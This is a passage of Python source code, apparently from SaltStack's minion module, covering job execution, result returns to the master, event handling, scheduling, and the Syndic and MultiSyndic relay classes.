if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
@classmethod
def _target(cls, minion_instance, opts, data):
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
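# For reference, _state_run is driven by minion config values such as (illustrative):
#   startup_states: sls
#   sls_list:
#     - edit.vim
#     - nginx
# or 'startup_states: top' together with 'top_file'; any other truthy value falls
# through to a full state.highstate run.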
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh,
notify=notify,
proxy=self.proxy) # pylint: disable=no-member
else:
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
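# Illustrative event data for manage_schedule (the shape of the nested schedule value
# is a hypothetical sketch, not taken from this codebase):
#   data = {'func': 'add', 'name': 'job1', 'persist': True,
#           'schedule': {'job1': {'function': 'test.ping', 'seconds': 3600}}}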
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
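# Example event data consumed by environ_setenv (hypothetical values):
#   data = {'environ': {'FOO': 'bar', 'OLD': False},
#           'false_unsets': True, 'clear_all': False}
# With false_unsets=True, a False value is presumably unset rather than set to ''.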
def clean_die(self, signum, frame):
'''
Python does not handle SIGTERM cleanly; if it is signaled, exit
the minion process cleanly.
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Handling event tag \'{0}\''.format(tag))
if package.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif package.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif package.startswith('_minion_mine'):
self._mine_send(tag, data)
elif package.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(tag, data)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove # pylint: disable=no-member
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
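# A minimal publication load that would pass this check might look like (illustrative):
#   {'tgt': 'web*', 'tgt_type': 'glob', 'jid': '20150101000000000000',
#    'fun': 'test.ping', 'arg': []}
# Anything missing 'tgt', 'jid', 'fun' or 'arg' is rejected before matching runs.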
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode to True because the Syndic does not support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload') # pylint: disable=no-member
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
